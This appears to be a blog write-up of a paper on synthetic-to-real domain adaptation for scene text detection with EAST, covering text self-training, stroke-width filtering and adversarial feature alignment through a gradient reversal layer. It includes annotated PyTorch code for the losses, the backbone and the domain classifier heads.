    EAST is a segmentation-based method with no proposal stage, and text instances with a small area have fewer supporting boxes ($r_i$) than large ones, which biases SRRS as a function of the number of supporting boxes ($N_s$). On the other hand, SWT is more reasonable for eliminating non-text regions, and similar prior work has shown its effectiveness. SWT is a local image operator that computes the most likely stroke width for each pixel. Its output is an $n \times m$ matrix in which each element contains the width of the stroke associated with that pixel. Specifically, each pixel on a stroke boundary is connected to the opposite side of the stroke along the gradient direction, and the width of the connecting line is that pixel's stroke width. SWS uses this stroke-width information to evaluate the predicted boxes and eliminates some non-text regions, as shown in Fig. 3 (blue line). For a typical text region the stroke width varies little, since text tends to keep a fixed stroke width. Denote the set of stroke widths in the $v$-th predicted box by $W^v_n$, and the stroke width of the $u$-th pixel by $w^v_u\in W^v_n$. The standard deviation is:

    $$\sigma_v=\sqrt{\frac{1}{N}\sum_{u=1}^{N}(w_u^v-\mu^v)^2}$$

    where $\mu^v$ is the mean stroke width in the $v$-th predicted box. Each predicted box thus has a standard deviation ($\sigma$) of its stroke widths, and we select reliable boxes with an upper threshold ($\epsilon_1$). In addition, we further filter the boxes by SWS:

    $$SWS_v=\frac{w_v}{\sigma_v^2}$$

    where $w_v$ is the most common stroke-width value in the $v$-th predicted box. Boxes are further selected by thresholding the score with a lower threshold $\epsilon_2$. Fig. 3(b) shows that some false positives are filtered out by SWS and $\sigma$.

    4 Experiments

    ​通过将场景文本检测器从合成数据集转移到真实的数据集来评估所提出的方法。我们采用几个纯合成数据和真实的场景数据(即,SynthText 和 ICDAR2015),它们具有共同的注释风格(即,字级)。

    4.1 Dataset and Experimental Settings

    4.1.1 Pure Synthetic Datasets.

    • SynthText 是一个包含约 80 万合成图像的大规模数据集。这些图像是通过将自然图像与随机字体,大小,颜色和方向渲染的文本混合而创建的,因此这些图像非常逼真。

    • VISD 包含与 10k 背景图像合成的 10k 图像。因此,该数据集没有重复的背景图像。丰富的背景图像使该数据集更加多样化。

    4.1.2 Real Datasets.

    • ICDAR 2015 是一个面向英文文本的多方向文本检测数据集,仅包含 1,000 张训练图像和 500 张测试图像。此数据集中的场景文本图像由 Google 眼镜拍摄,没有考虑定位,图像质量和视点。该数据集具有小的,模糊的和多方向的文本实例。

    • ICDAR 2013 在 ICDAR 2013 Robust 阅读竞赛期间发布,用于聚焦场景文本检测,包括高分辨率图像,229 用于训练,233 用于测试,包含英文文本。

    4.1.3 Implementation Details.

    ​在所有实验中,我们使用 EAST 作为基础网络。在原始论文之后,输入被调整为 512×512,并且我们应用了原始论文中使用的所有增强。该网络使用由 12 幅图像组成的批量输入进行训练,其中 6 幅图像来自源域,另外 6 幅图像来自目标域。Adam 优化器被采用作为我们的学习率方案。所有实验都使用相同的训练策略:

    1. 使用 ATA 对网络进行 80k 次迭代的预训练,以学习域不变特征,
    2. 使用预训练的模型来生成相应的伪标签(即,伪边界框标签和负样本图),然后用生成的伪标签微调预训练模型。在生成伪标签的过程中,我们将笔划宽度消除参数设置为 3.0 和 0.30。

    ​所有实验都在常规工作站(CPU:Intel(R)Core(TM)i7- 7800 X CPU@3.50 GHz; GPU:GTX 2080 Ti)上进行。

    4.2 Performance Comparison and Analysis

    webp

    不同模型在 Syn2Real 场景文本检测数据集上的性能,用于 SynthText/VISD → ICDAR 2015 传输。UL 指未标记的数据。* 表示 UnrealText 中报告的性能。† 指的是我们的测试性能。

    webp

    不同模型在 Syn2Real 场景文本检测数据集上的性能,用于 SynthText/VISD → ICDAR 2013 传输。UL 指未标记的数据。*表示 UnrealText 中报告的性能。† 指的是我们的测试性能。

    4.2.1 Synthetic→ ICDAR2015 Transfer.

    ​表 1 总结了合成→ ICDAR 2015 转移任务的性能比较。EAST 模型作为仅使用源代码的基线训练具有不令人满意的 F 分数(使用 SynthText 为 60.5%,使用 VISD 为 64.5%),这可以被视为没有自适应的下限。通过结合所提出的方法,F-评分分别达到 68.0% 和 73.8%,比基线分别提高了 7.5% 和 9.3%。基于字符注释的 GCN 比基于单词注释的性能有所提高。然而,GCN 的性能仍然低于我们的方法,它利用了自我训练和对抗学习。实验结果表明,该方法能够有效地消除源数据和目标数据的领域差异。

    4.2.2 Synthetic→ ICDAR2013 Transfer.

    ​为了进一步验证该方法的有效性,以 ICDAR 2013 为目标域,进行了合成到真实的场景文本检测迁移的实验。实验结果报告在表 2 中。具体来说,对于 SynthText→ ICDAR 2013 转移任务,与仅使用源代码的基线 EAST 训练相比,我们实现了 11.3% 的性能提升。与合成→ICDAR2015 转移实验类似,VISD 也被用作比较实验中的源域。在使用 ATA 和 TST 后,该方法比基线 EAST 的性能提高了 6.3%,这表明该方法在减少域偏移方面的有效性。请注意,为了公平比较,除了添加 ATA 和 TST 之外,所提出的方法的基础网络和实验设置与基线 EAST 相同。

    4.2.3 ICDAR2013→ ICDAR2015 Transfer.

    ​表 3 显示了 ICDAR 2013 → ICDAR 2015 转移任务的性能。ICDAR 2013 的注释是矩形框,而 ICDAR 2015 的注释是旋转框,这限制了传输性能。然而,与仅使用源代码的基线 EAST 训练相比,我们实现了 7.6% 的性能提升。

    webp

    不同型号的检测结果示例。第一行是仅使用源域的基线训练的结果。第二行是使用所提出方法的结果。

    4.3 Ablation Study

    4.3.1 Component Analysis.

    ​为了验证所提出方法的有效性,我们在四个数据集上进行了 Syn2Real 转移任务的消融实验:SynthText、VISD、ICDAR2015 和 ICDAR2013。表 3 显示了实验结果。对于 SynthText→ICDAR2015 转移任务,使用 TST 和 ATA 后,F-得分分别提高了 4.1% 和 3.5%。此外,我们的方法比基线产生了高达 8% 的召回率,这表明了这种方法在提高模型鲁棒性方面的有效性。通过结合这两个组成部分,所提出方法的 F-得分达到了 68.0%,比基线绝对提高了 7.5%。VISD→ICDAR2015 转移任务表现更好,因为 VISD 具有更真实的合成效果。特别是,使用我们的方法的 F-得分达到了 73.8%,比相应的基线绝对提高了 9.3%。对于 SynthText/VISD→ICDAR2015 的传输,性能的提高也很显著。我们使用 SynthText 实现了 11.3% 的性能改进,使用 VISD 实现了 6.3% 的性能改善。

    webp

    消融研究所提出的 Syn2Real 场景文本检测转移。“基线”表示仅使用源域中的标记数据进行训练。表示与仅使用源代码的基线训练相比,F-分数的增加。UL 指未标记的数据。'F-target'表示在源域中进行预训练,并在目标域中使用原始伪边界框进行微调。

    4.3.2 Parameter Sensitivity on TST.

    ​为了探索阈值参数(即,在 SWS 上,我们进行了几组比较实验,结果如表 4 所示。由于我们认为在理想情况下文本区域中的笔画宽度的标准差接近于零,因此使用阈值参数 $\epsilon_1$ 来过滤预测框。结果表明,当神经网络的参数为 1 时,网络的性能最好,且网络的性能对参数的变化不敏感。与 $\epsilon_1$ 相似,采用 0.2、0.3、0.4 三个不同的值对 $\epsilon_2$ 的参数敏感性进行了验证,结果表明 $\epsilon_2$ 的值(0.3)是合理的。

    webp

    4.3.3 Qualitative Analysis.

    ​图 4 示出了用于合成到真实的转换任务的文本检测结果的四个示例。实验结果表明,该方法提高了模型在不同复杂背景和不同文本下的鲁棒性。TST 最小化了 FP 和 FN 的一部分,如第一列示例所示,ATA 帮助模型学习更多有区别的特征。

    webp

    5 Conclusions

    ​本文首先介绍了一种用于场景文本检测的合成域到真实的域自适应方法,该方法将知识从合成数据(源域)转移到真实的数据(目标域)。提出的文本自训练(TST)有效地减少了伪标签的假阴性和假阳性的不利影响,而对抗性文本实例对齐(ATA)有助于网络以对抗的方式学习更多的域不变特征。我们评估了所提出的方法与 EAST 在几个常见的合成和真实的数据集。实验结果表明,该方法对于合成到真实的迁移文本检测任务有很大的改进。

    ]]>
    + 资源

    全文

    Abstract

​基于深度学习的场景文本检测算法在充分利用已标注训练数据的前提下能够获得较好的检测性能。然而,手动标注费时费力;在极端情况下,相应的标注数据甚至无法获得。利用合成数据是一种非常有前途的解决方案,但合成数据与真实数据之间存在域分布不匹配的问题。针对场景文本检测中严重的域分布不匹配问题,本文提出了一种从合成域到真实域的自适应场景文本检测方法,其核心是**文本自训练(TST)和对抗性文本实例对齐(ATA)**。ATA 通过以对抗方式训练域分类器来帮助网络学习域不变特征;TST 则减少来自不准确伪标签的假阳性(FP)和假阴性(FN)的不利影响。当从合成场景适应到真实场景时,这两个组件都对提高场景文本检测器的性能有积极作用。我们通过从 SynthText、VISD 迁移到 ICDAR2015、ICDAR2013 对所提方法进行了评估。实验结果验证了所提方法的有效性(提升超过 10%),对领域自适应场景文本检测具有重要的探索意义。

    1 Introduction

​场景文本检测因其在计算机视觉中的众多应用而受到越来越多的关注。此外,在过去的几十年里,场景文本检测取得了巨大的成功。然而,这些检测方法需要手动标注大量的训练数据,这非常昂贵且耗时。虽然已经存在几个公共基准,但它们只涵盖了非常有限的场景。在现实世界中,特定的应用任务通常需要收集和标注新的训练数据集,而收集足够的标注数据是困难的,甚至是不可能的。因此,昂贵的标注成本已成为基于深度学习方法的文本检测应用的主要问题。

​随着计算机图形学的飞速发展,一种可供选择的方法是利用大量可从虚拟世界中获得的合成数据,其真值(ground truth)可以自动、免费地生成。

    • SynthText 首先提供了一个虚拟场景文本数据集,并自动生成带有单词级和字符级注释的合成图像。
    • VISD 为文本合成配备了选择性语义分割,以产生更真实的样本。
    • UnrealText 通过 3D 图形引擎提供逼真的虚拟场景文本图像,该 3D 图形引擎通过将场景和文本作为一个整体呈现来提供逼真的外观。

    ​尽管合成数据提供了在训练场景文本检测器中替代真实的图像的可能性,其具有低标注成本和高标注精度,但是许多先前的工作也表明,由于被称为“域移位 Domain Shift”的现象,仅使用合成数据的训练降低了对真实的数据的性能。如图 1 所示,与常见对象不同,文本在现实场景中具有更多的形状、颜色、字体、大小和方向的多样性,这导致合成数据与真实的数据之间存在较大的域差距。因此,当仅从合成数据向真实的数据应用模型学习时,模型的性能显著降低。

    webp

不同数据集的例子。第一行分别来自真实数据集 ICDAR 2013、ICDAR 2015 和 ICDAR 2017 MLT。
第二行来自 SynthText、VISD 和 UnrealText。合成数据和真实数据之间仍有相当大的领域差距。

​为了解决域偏移问题,本文提出了一种合成到真实的域自适应场景文本检测方法,利用合成数据和未标记的真实数据,有效提高模型在真实数据上的性能。受 [1909.00597] Self-Training and Adversarial Background Regularization for Unsupervised Domain Adaptive One-Stage Object Detection (arxiv.org) 和 [1409.7495] Unsupervised Domain Adaptation by Backpropagation (arxiv.org) 的启发,本文提出了**文本自训练(TST)**和**对抗性文本实例对齐(ATA)**来减少域偏移。

自训练在领域自适应的常见目标检测和语义分割上取得了出色的结果;然而,在场景更多样、背景更复杂的场景文本检测任务中,这一方向尚未被探索。为了更好地将自训练应用于场景文本检测,TST 用于抑制伪标签中出现的假阳性和假阴性的不利影响。此外,我们首次利用对抗学习帮助模型学习场景文本的判别特征。**对抗学习已被证明在域自适应图像分类和常见目标检测等任务中是有效的。由于大多数场景文本检测器是没有区域建议过程的单阶段检测器,我们提出 ATA,以对抗训练的方式对齐文本实例的判别特征。**本文的主要贡献如下:

    • 我们引入文本自训练(TST),通过最小化不准确伪标签的不利影响来提高域自适应场景文本检测的性能。
    • 我们提出了**对抗性文本实例对齐(ATA)**来帮助模型学习域不变特征,从而增强模型的泛化能力。
• 我们首次提出了一种用于场景文本检测的合成到真实的域自适应方法,将知识从合成数据(源域)迁移到真实数据(目标域)。

​我们在场景文本检测迁移任务(例如,SynthText → ICDAR 2015)上对所提方法进行了评估。实验结果表明,该方法能够有效解决场景文本检测中的域偏移问题,对领域自适应场景文本检测具有重要的探索意义。

2 Related Work

2.1 Scene Text Detection

​简要介绍场景文本检测的相关工作。

    2.2 Domain Adaptation

领域自适应旨在减小训练数据和测试数据之间的领域差距。最近的工作使用更有效的手段来减小域间隙,例如将域分类器与梯度反转相结合。

    2.3 Self-Training

​先前的工作使用自训练来弥补标注信息的缺乏。然而,由于相关研究不足,自训练方法在文本检测上还需要进一步的探索。

    3 Proposed Method

​在这一节中,我们分析了由域偏移引起的问题,并介绍 TST 和 ATA 的原理以及如何使用它们进行域适配。为了评估我们的方法,采用 EAST 作为基线。

    3.1 Problem and Analysis

    虽然合成场景文本数据可以自动生成多样化的外观和准确的 GT,但仅用合成数据训练的模型不能直接应用于真实的场景,因为合成数据集和真实的数据集之间存在显著的域偏移。从概率的角度看问题会更清楚。我们将合成数据域称为源域,将真实的数据域称为目标域。场景文本检测问题可以看作是学习后验 $P(B|I)$(已知图像特征求预测边界框),其中 $I$ 是指图像特征,$B$ 是文本实例的预测边界框。使用贝叶斯公式,后验 $P(B|I)$ 可以分解为:

$$P(B|I)=\frac{P(I|B)\cdot P(B)}{P(I)}=\frac{P(I|B)}{P(I)}\cdot P(B)$$

    ​我们在此任务中进行协变量移位假设,即先验概率 $P(B)$ 对于两个域是相同的(预测边界框的划定相同,正确划定出文本的范围)。$P(I|B)$是指 $I$ 的条件概率,这意味着在给定预测结果为真的情况下学习到真特征的可能性。我们还考虑了 $P(I|B)$ 对于两个域而言是相同的。因此,后验概率的差异由先验概率 $P(I)$ 引起(提取出的特征不同)。换句话说,为了检测文本实例,检测结果中的差异是由域改变特征引起的。为了提高模型的泛化能力,模型需要学习更多的域不变特征,无论输入图像属于哪个域都保持相同的 $P(I)$(迫使模型在读取合成数据和真实数据时,都提取出同样的特征)。在 EAST 模型中,图像特征 $P(I)$ 是指从 backbone 输出的特征。因此,特征图应该在源域和目标域之间对准(即,$P_{s}(I)=P_{t}(I)$)。为了实现这一目标,我们建议 ATA 协调这些特性,下一小节将介绍更多详细信息。

    3.2 Adversarial Text Instance Alignment

    ​受 [1409.7495] Unsupervised Domain Adaptation by Backpropagation (arxiv.org) 的启发,采用 ATA 来帮助网络学习域不变特征。在 EAST 模型中,图像特征 $P(I)$ 是指主干的特征图输出(即,384,图 2 中的 1/32 特征)。为了在源域和目标域之间对齐特征 $P(I)$,使用域分类器来混淆特征域。具体地,针对每个输入图像训练域分类器,并预测图像所属的域标签(代码中 y_pred_prob_f)。我们假设模型的输入样本为 $x\in X$,其中 $X$ 是某个输入空间。$y_i$ 表示第 $i$ 个训练图像的域标签(代码中 y_true),对于源域 $y_i=0$,对于目标域 $y_i = 1$。$p_i(x)$ 是域分类器的输出,我们使用交叉熵作为损失函数:

$$L_d=-\sum_i\Big(y_i\ln p_i(x)+(1-y_i)\ln\big(1-p_i(x)\big)\Big)$$

def bce_loss(y_true, y_pred_logits):
    # y_true:真实域标签(0 或 1)。
    # y_pred_logits:模型的原始预测值(logits),即未经过激活函数的输出。
    # y_pred_prob = F.sigmoid(y_pred_logits)
    # y_true_f = y_true.view(-1)
    # y_true_f = y_true
    y_pred_logits = y_pred_logits.view(-1)
    y_pred_prob_f = y_pred_logits.clamp(min=1e-7, max=1 - 1e-7)  # 将预测值限制在 [1e-7, 1 - 1e-7] 之间,防止对数计算时数值不稳定。
    return -(y_true * y_pred_prob_f.log() + (1. - y_true) * (1 - y_pred_prob_f).log()).mean()  # 计算交叉熵损失,并返回平均损失。

​为了学习域不变特征,我们以对抗的方式优化参数:通过最小化上述域分类损失来优化域分类器的参数,并通过最大化该损失来优化基础网络的参数。更具体地,在 EAST 的主干和域分类器之间添加了梯度反转层(GRL):前向传播经过 GRL 时保持不变,反向传播经过 GRL 时梯度的符号被反转(梯度反转层位于特征提取器与域分类器之间,域分类损失的梯度在反向传播回特征提取器的参数之前会自动取反,从而实现了类似于 GAN 的对抗损失)。如图 2 所示,特征金字塔网络(FPN)和骨干网络在训练阶段都最小化 EAST 的原始损失 $L_{task}$,即 EAST 中的分数图损失与几何损失。$L^t_{task}$ 指在目标域中使用伪标签进行训练,$L^s_{task}$ 指在源域中进行训练。因此,不同参数空间的训练目标不同:

$$\begin{cases}L_f=\min\big(L_{task}^t(\theta_f|x^t)+L_{task}^s(\theta_f|x^s)-\lambda L_d(\theta_f|(x^s,x^t))\big)&\theta_f\in F,\\L_d=\min\big(L_d(\theta_d|(x^s,x^t))\big)&\theta_d\in C,\\L_h=\min\big(L_{task}^t(\theta_h|x^t)+L_{task}^s(\theta_h|x^s)\big)&\theta_h\in D,\end{cases}$$

• 骨干网络的目标:最小化检测损失、最大化域分类器的损失(既要骗过域分类器,又要提取出有价值的特征)。
• 域分类器的目标:最小化域分类器的损失。
• FPN 的目标:最小化检测损失(依旧做标签预测)。

    ​其中 $F$、$C$、$D$ 分别是骨干、域分类器和 FPN 的参数空间。总体训练目标如下:

    $$L=L_f+L_h+\lambda L_d$$

class Loss_target(nn.Module):
    def __init__(self, weight_angle=10):
        # weight_angle:角度损失的权重系数,默认为 10,用于控制角度损失在总损失中的影响程度。
        super(Loss_target, self).__init__()
        self.weight_angle = weight_angle
        self.bce = bce_loss  # 指定使用的二分类交叉熵损失函数(bce_loss),在 forward 中用来计算领域损失。

    def forward(self, gt_score, pred_score, gt_geo, pred_geo, ignored_map, pre_domain):
        if torch.sum(gt_score) < 1:
            # 如果 gt_score 的总和小于 1(表示没有有效目标),返回 0 损失,避免无意义的计算。
            return torch.sum(pred_score + pred_geo) * 0

        # 使用 get_dice_loss 计算分类损失;pred_score * (1 - ignored_map) 确保计算损失时忽略指定区域。
        classify_loss = get_dice_loss(gt_score, pred_score * (1 - ignored_map))

        # 目标域的域标签设为 1,并转移到 GPU;使用 bce_loss 计算领域损失,
        # 即模型预测的领域分数与目标领域标签之间的差异。
        gt_domain = torch.Tensor([[[1.]]]).to(torch.device("cuda"))
        domain_loss = self.bce(gt_domain, pre_domain)

        # 使用 get_geo_loss 计算几何损失,包括交并比(IoU)损失和角度损失,
        # 并按 weight_angle 对角度损失加权,得到总的几何损失。
        iou_loss_map, angle_loss_map = get_geo_loss(gt_geo, pred_geo)
        angle_loss = torch.sum(angle_loss_map * gt_score) / torch.sum(gt_score)
        iou_loss = torch.sum(iou_loss_map * gt_score) / torch.sum(gt_score)
        geo_loss = self.weight_angle * angle_loss + iou_loss
        # print('classify loss is {:.8f}, angle loss is {:.8f}, iou loss is {:.8f}'.format(classify_loss, angle_loss, iou_loss))
        return geo_loss, classify_loss, domain_loss  # 返回三个损失值:几何损失、分类损失和领域损失。

    ​其中 $\lambda$ 是权衡参数,我们在所有实验中将其设置为 0.2。通过优化损失,网络可以学习更多的文本域不变特征,更好地从合成数据转换到真实的数据。
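​后文 DomainAdaptationModule 代码中用到的 GradientScalarLayer 就是这种梯度反转/缩放层。下面给出一个最小的 PyTorch 示意实现(按上述原理编写的假设性示例,并非原仓库代码):前向传播为恒等映射,反向传播把梯度乘以常数 weight,weight 取负值(如 -0.1)即实现梯度反转。

```python
import torch

class _GradientScalar(torch.autograd.Function):
    # 前向:恒等映射;反向:把梯度乘以常数 weight(取负值即梯度反转)。
    @staticmethod
    def forward(ctx, x, weight):
        ctx.weight = weight
        return x.view_as(x)

    @staticmethod
    def backward(ctx, grad_output):
        # 对 weight 本身不求梯度,对应位置返回 None。
        return ctx.weight * grad_output, None

class GradientScalarLayer(torch.nn.Module):
    def __init__(self, weight):
        super().__init__()
        self.weight = weight  # 例如 -1.0 * 0.1,与后文 DomainAdaptationModule 中的用法一致

    def forward(self, x):
        return _GradientScalar.apply(x, self.weight)
```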

    webp

具有相应优化目标的网络架构。$\theta$ 表示 EAST 的参数。域分类器(绿色)经由梯度反转层添加在特征提取器之后,梯度反转层在基于反向传播的训练期间将梯度乘以某个负常数。$L_{task}$ 是 EAST 原有的检测损失,$L_d$ 是领域分类器的损失。

cfg = [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M']  # 配置列表,指定网络层的类型和数量。

def make_layers(cfg, batch_norm=False):
    layers = []  # 用于存储创建的层。
    in_channels = 3  # 初始化为 3,对应输入图像的通道数。
    for v in cfg:
        if v == 'M':  # 如果值为 'M',添加一个 2x2 的最大池化层。
            layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
        else:  # 否则,创建一个卷积层(nn.Conv2d),后跟可选的批归一化层和 ReLU 激活函数。
            conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
            if batch_norm:
                layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
            else:
                layers += [conv2d, nn.ReLU(inplace=True)]
            in_channels = v  # 更新 in_channels 为当前卷积层的输出通道数 v。
    return nn.Sequential(*layers)  # 使用 nn.Sequential 将所有层打包成一个顺序容器,返回构造好的网络层。


class VGG(nn.Module):
    def __init__(self, features):
        super(VGG, self).__init__()
        self.features = features  # 存储卷积层。
        self.avgpool = nn.AdaptiveAvgPool2d((7, 7))  # 自适应平均池化层,将特征图大小调整为 7x7。
        self.classifier = nn.Sequential(
            nn.Linear(512 * 7 * 7, 4096),
            nn.ReLU(True),
            nn.Dropout(),
            nn.Linear(4096, 4096),
            nn.ReLU(True),
            nn.Dropout(),
            nn.Linear(4096, 1000),
        )  # 全连接层序列,包括 ReLU 激活层和 Dropout 层,用于分类。

        for m in self.modules():  # 初始化权重
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
                if m.bias is not None:
                    nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.BatchNorm2d):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.Linear):
                nn.init.normal_(m.weight, 0, 0.01)
                nn.init.constant_(m.bias, 0)

    def forward(self, x):
        x = self.features(x)  # 通过 self.features 处理输入 x。
        x = self.avgpool(x)  # 应用自适应平均池化,将特征图调整为 7x7。
        x = x.view(x.size(0), -1)  # 将池化后的特征图展平,以适应全连接层输入。
        x = self.classifier(x)  # 通过 self.classifier 进行最终的分类预测。
        return x


class extractor(nn.Module):  # 特征提取层。
    def __init__(self, pretrained):
        super(extractor, self).__init__()
        vgg16_bn = VGG(make_layers(cfg, batch_norm=True))  # 使用 VGG 类创建带有批归一化的 VGG16 网络。
        # state_dict = load_state_dict_from_url('https://download.pytorch.org/models/vgg16-397923af.pth')
        # vgg16_bn.load_state_dict(state_dict)
        if pretrained:  # 如果 pretrained 为 True,则加载本地路径的预训练权重。
            vgg16_bn.load_state_dict(torch.load(
                '/data/data_weijiawu/Sence_Text_detection/Paper-ACCV/baseline/EAST_1/vgg16_bn-6c64b313.pth'))
        self.features = vgg16_bn.features  # self.features 被设置为 VGG16 网络的卷积层部分(使用 VGG16 进行特征提取)。

    def forward(self, x):
        out = []
        for m in self.features:  # 遍历 self.features 中的每一层,对输入 x 进行逐层处理。
            x = m(x)
            if isinstance(m, nn.MaxPool2d):  # 将每个最大池化层的输出保存到 out 列表中。
                out.append(x)
        return out[1:]  # 返回 out[1:],即从第二个池化层开始的特征图,以匹配后续特征融合的需求。
class merge(nn.Module):  # EAST 的核心特征融合层:在特征图上做一系列卷积,并通过逐步上采样融合来自不同尺度的特征,生成最终的输出特征图。
    def __init__(self):
        super(merge, self).__init__()

        self.conv1 = nn.Conv2d(1024, 128, 1)
        self.bn1 = nn.BatchNorm2d(128)
        self.relu1 = nn.ReLU()
        self.conv2 = nn.Conv2d(128, 128, 3, padding=1)
        self.bn2 = nn.BatchNorm2d(128)
        self.relu2 = nn.ReLU()

        self.conv3 = nn.Conv2d(384, 64, 1)
        self.bn3 = nn.BatchNorm2d(64)
        self.relu3 = nn.ReLU()
        self.conv4 = nn.Conv2d(64, 64, 3, padding=1)
        self.bn4 = nn.BatchNorm2d(64)
        self.relu4 = nn.ReLU()

        self.conv5 = nn.Conv2d(192, 32, 1)
        self.bn5 = nn.BatchNorm2d(32)
        self.relu5 = nn.ReLU()
        self.conv6 = nn.Conv2d(32, 32, 3, padding=1)
        self.bn6 = nn.BatchNorm2d(32)
        self.relu6 = nn.ReLU()

        self.conv7 = nn.Conv2d(32, 32, 3, padding=1)
        self.bn7 = nn.BatchNorm2d(32)
        self.relu7 = nn.ReLU()

        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
                if m.bias is not None:
                    nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.BatchNorm2d):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)

    def forward(self, x):
        # F.interpolate:将特征图上采样到更大的空间分辨率,使用 bilinear 插值。
        # torch.cat:将上采样后的特征图与来自不同层的特征图沿通道维度拼接,融合不同尺度的信息。
        y = F.interpolate(x[3], scale_factor=2, mode='bilinear', align_corners=True)
        y = torch.cat((y, x[2]), 1)
        y = self.relu1(self.bn1(self.conv1(y)))
        y = self.relu2(self.bn2(self.conv2(y)))

        y = F.interpolate(y, scale_factor=2, mode='bilinear', align_corners=True)
        y = torch.cat((y, x[1]), 1)
        y = self.relu3(self.bn3(self.conv3(y)))
        y = self.relu4(self.bn4(self.conv4(y)))

        y = F.interpolate(y, scale_factor=2, mode='bilinear', align_corners=True)
        y = torch.cat((y, x[0]), 1)
        y = self.relu5(self.bn5(self.conv5(y)))
        y = self.relu6(self.bn6(self.conv6(y)))

        y = self.relu7(self.bn7(self.conv7(y)))
        return y


class output(nn.Module):  # 输出层
    def __init__(self, scope=512):
        super(output, self).__init__()
        self.conv1 = nn.Conv2d(32, 1, 1)  # 各卷积层用于处理输入特征图,输出通道数不同,对应不同类型的预测。
        self.sigmoid1 = nn.Sigmoid()  # 应用于卷积输出的 Sigmoid 激活函数,用于输出概率。

        # self.conv1_1 = nn.Conv2d(32, 1, 1)
        # self.sigmoid1_1 = nn.Sigmoid()

        self.conv2 = nn.Conv2d(32, 4, 1)
        self.sigmoid2 = nn.Sigmoid()
        self.conv3 = nn.Conv2d(32, 1, 1)
        self.sigmoid3 = nn.Sigmoid()
        self.scope = 512  # 用于缩放位置预测的参数,设为 512。

        # GRL domain classifier
        # self.gap = nn.AdaptiveAvgPool2d(1)
        # self.sigmoid_gap = nn.Sigmoid()
        # self.GRL = RevGrad()
        # self.conv_gap = nn.Conv2d(32, 1, 1)

        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')  # 卷积层权重使用 Kaiming 正态分布初始化,偏置初始化为 0。
                if m.bias is not None:
                    nn.init.constant_(m.bias, 0)

    def forward(self, x):
        # score_1 = self.GRL(x)
        # grl = self.sigmoid_gap(self.conv_gap(score_1))

        # domain_feature = self.gap(self.GRL(C[3]))
        # class_domain = self.sigmoid_gap(self.conv_gap(domain_feature))

        score = self.sigmoid1(self.conv1(x))  # 第一个卷积层的输出,经 Sigmoid 激活,代表得分图。
        loc = self.sigmoid2(self.conv2(x)) * self.scope  # 第二个卷积层的输出,经 Sigmoid 激活并缩放,表示位置预测。
        angle = (self.sigmoid3(self.conv3(x)) - 0.5) * math.pi  # 第三个卷积层的输出,经 Sigmoid 激活并调整,表示角度预测。
        geo = torch.cat((loc, angle), 1)  # 将位置和角度预测拼接,形成最终的几何输出。
        return score, geo
class DAImgHead(nn.Module):
    """
    Adds a simple Image-level Domain Classifier head. 添加一个图像级领域分类器头,用于图像层面的域分类。
    """

    def __init__(self):
        super(DAImgHead, self).__init__()

        self.conv1_da = nn.Conv2d(512, 256, kernel_size=1, stride=1)  # 将输入通道数从 512 转换为 256 的卷积层。
        self.conv2_da = nn.Conv2d(256, 1, kernel_size=1, stride=1)  # 将通道数从 256 转换为 1 的卷积层。

        for l in [self.conv1_da, self.conv2_da]:  # 权重初始化为均值 0、标准差 0.001 的正态分布,偏置初始化为 0。
            torch.nn.init.normal_(l.weight, std=0.001)
            torch.nn.init.constant_(l.bias, 0)

    def forward(self, x):  # 输入 x 经过 conv1_da 和 ReLU 激活后,再经过 conv2_da 得到输出。
        t = F.relu(self.conv1_da(x))
        return self.conv2_da(t)


class DAInsHead(nn.Module):
    """
    Adds a simple Instance-level Domain Classifier head. 添加一个实例级领域分类器头,用于实例级别的域分类。
    """

    def __init__(self):
        super(DAInsHead, self).__init__()
        self.fc1_da = nn.Linear(2028, 1024)  # 将 2028 维输入特征映射到 1024 维的全连接层。
        self.fc2_da = nn.Linear(1024, 1024)  # 将 1024 维特征映射到 1024 维的全连接层。
        self.fc3_da = nn.Linear(1024, 1)  # 将 1024 维特征映射到 1 维输出的全连接层。
        for l in [self.fc1_da, self.fc2_da]:  # fc1_da、fc2_da 权重初始化为标准差 0.01 的正态分布,fc3_da 为 0.05,偏置均初始化为 0。
            nn.init.normal_(l.weight, std=0.01)
            nn.init.constant_(l.bias, 0)
        nn.init.normal_(self.fc3_da.weight, std=0.05)
        nn.init.constant_(self.fc3_da.bias, 0)

    def forward(self, x):  # 输入依次经过 fc1_da、ReLU、50% dropout,再经 fc2_da、ReLU、50% dropout,最后经 fc3_da 得到输出。
        x = F.relu(self.fc1_da(x))
        x = F.dropout(x, p=0.5, training=self.training)

        x = F.relu(self.fc2_da(x))
        x = F.dropout(x, p=0.5, training=self.training)

        x = self.fc3_da(x)
        return x


class DomainAdaptationModule(torch.nn.Module):
    """
    Module for Domain Adaptation Component. 领域自适应组件:从主干网络获取特征图,
    经梯度反转层与领域分类头处理图像级特征,促使模型学习领域不变特征。适用于 FPN 与非 FPN。
    """

    def __init__(self):
        super(DomainAdaptationModule, self).__init__()

        self.avgpool = nn.AvgPool2d(kernel_size=7, stride=7)  # 7x7 的平均池化层。
        self.gap = nn.AdaptiveAvgPool2d(1)  # 自适应平均池化层,将输入特征图压缩成每个通道一个值。
        self.sigmoid_gap = nn.Sigmoid()  # Sigmoid 激活函数,将特征值压缩到 [0, 1] 范围。

        self.grl_img = GradientScalarLayer(-1.0 * 0.1)  # 梯度反转层,在反向传播时反转梯度,促使网络学习领域不变特征。
        self.grl_ins = GradientScalarLayer(-1.0 * 0.1)
        self.grl_img_consist = GradientScalarLayer(1.0 * 0.1)  # 与 grl_img、grl_ins 类似,但权重为正,用于一致性约束。
        self.grl_ins_consist = GradientScalarLayer(1.0 * 0.1)

        self.imghead = DAImgHead()  # 处理图像级特征的领域分类头。
